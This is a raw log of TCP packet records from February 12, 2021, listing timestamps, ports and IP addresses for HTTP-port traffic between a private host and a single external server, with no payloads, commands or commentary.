Feb 12, 2021 10:00:46.794054031 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.794101000 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.794102907 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.794157982 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.795955896 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.796030998 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.796036959 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.796097994 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.796119928 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.796150923 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.796192884 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.796212912 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.796220064 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.796262026 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.796266079 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.796322107 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.819892883 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.819994926 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834244967 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834319115 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834341049 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834374905 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834381104 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834431887 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834431887 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834484100 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834486008 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834542990 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834542990 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834594011 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834598064 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834661961 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834712982 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834762096 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834811926 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834871054 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.834949017 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.834955931 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.835022926 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.835346937 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.835411072 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.835619926 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.835676908 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.835751057 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.835805893 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.835807085 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.835856915 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.835859060 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.835911989 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.835912943 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.835966110 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.835968018 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.836016893 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.836023092 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.836076975 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.836127043 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.836132050 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.836179018 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.836179972 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.836234093 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.836234093 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.836323023 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.840864897 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.840967894 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.858957052 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.859066963 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.875830889 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.875902891 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.875952005 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.876008034 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.876025915 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.876053095 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.876065969 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.876108885 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.876128912 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.876132011 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.876188040 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.876255989 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.876848936 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.876914024 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.876966953 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877012014 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877032995 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877038002 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877095938 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877096891 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877147913 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877151966 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877199888 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877207041 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877260923 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877265930 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877312899 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877319098 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877372026 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877399921 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877428055 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.877471924 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.877525091 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.878804922 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.878935099 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.901530981 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.901674032 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.915210962 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.915241957 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.915262938 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.915285110 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.915307045 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.915313005 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.915328979 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.915375948 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917644978 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917670965 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917694092 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917716026 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917731047 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917737961 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917762041 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917783976 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917785883 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917812109 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917813063 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917834997 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917856932 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917866945 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917881966 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917886019 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917905092 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917927027 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917933941 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917949915 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917970896 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.917979002 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.917990923 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.918001890 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.918036938 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.918150902 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.939203024 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:47.005774021 CET	49760	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:47.017492056 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:47.096822977 CET	80	49760	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:47.096971035 CET	49760	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:47.101313114 CET	49760	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:47.182109118 CET	80	49760	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:48.752468109 CET	49762	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:48.753518105 CET	49763	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:48.830602884 CET	80	49762	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:48.830746889 CET	49762	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:48.832573891 CET	49762	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:48.834063053 CET	80	49763	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:48.835076094 CET	49763	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:48.954529047 CET	80	49762	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:49.241118908 CET	80	49762	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:49.241147041 CET	80	49762	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:49.241460085 CET	49762	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:49.248619080 CET	49762	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:49.326703072 CET	80	49762	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:50.498075008 CET	49763	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.061187029 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.142296076 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.142510891 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.153654099 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.245007038 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245045900 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245073080 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245096922 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245112896 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.245120049 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245147943 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245172024 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245176077 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.245196104 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245218039 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.245219946 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245229959 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.245243073 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.245364904 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.327452898 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327512026 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327552080 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327588081 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327637911 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327681065 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327719927 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327759981 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327775002 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.327799082 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327816963 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.327838898 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327878952 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327919006 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327950001 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.327966928 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.327970982 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.328012943 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.328051090 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.328089952 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.328115940 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.328126907 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.328135014 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.328166008 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.328203917 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.328243017 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.328270912 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.328290939 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.409311056 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409425974 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409493923 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409507990 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.409562111 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409626007 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409689903 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409713030 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.409750938 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.409753084 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409813881 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409862041 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.409872055 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409934998 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409995079 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.409996986 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410060883 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410125017 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410134077 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410182953 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410233974 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410243988 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410305023 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410355091 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410362005 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410422087 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410479069 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410536051 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410542965 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410604954 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410609961 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410664082 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410716057 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410717010 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410767078 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410819054 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410870075 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410921097 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.410954952 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.410984039 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411045074 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411102057 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411150932 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.411160946 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411189079 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.411223888 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411283016 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411329031 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.411339998 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411392927 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411401987 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.411456108 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411514044 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411530018 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.411566973 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411634922 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411637068 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.411701918 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.411850929 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.492959023 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493011951 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493051052 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493087053 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493120909 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493145943 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493163109 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493165970 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493199110 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493216991 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493246078 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493285894 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493321896 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493356943 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493423939 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493454933 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493460894 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493496895 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493531942 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493566990 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493592024 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493611097 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493624926 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493653059 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493685961 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493722916 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493746996 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493758917 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493773937 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493804932 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493844032 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493879080 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493905067 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493928909 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.493932009 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.493980885 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494014978 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494034052 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.494050980 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494085073 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494127989 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494167089 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494177103 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.494203091 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494237900 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494242907 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.494273901 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:19.494334936 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.494406939 CET	49765	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:19.575656891 CET	80	49765	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:24.571619034 CET	49766	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:24.649748087 CET	80	49766	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:24.651787996 CET	49766	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:24.651830912 CET	49766	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:24.770549059 CET	80	49766	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:25.300477982 CET	80	49766	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:25.300735950 CET	49766	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:25.300762892 CET	49766	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:25.369386911 CET	49767	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:25.378837109 CET	80	49766	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:25.447320938 CET	80	49767	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:25.447503090 CET	49767	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:25.447871923 CET	49767	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:25.447890043 CET	49767	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:25.525708914 CET	80	49767	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.080135107 CET	80	49767	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.081971884 CET	49767	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.082015991 CET	49767	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.143507004 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.159981012 CET	80	49767	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.224466085 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.224721909 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.224764109 CET	49768	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:01:26.346522093 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629220009 CET	80	49768	35.228.31.40	192.168.2.6
Feb 12, 2021 10:01:26.629369974 CET	80	49768	35.228.31.40	192.168.2.6
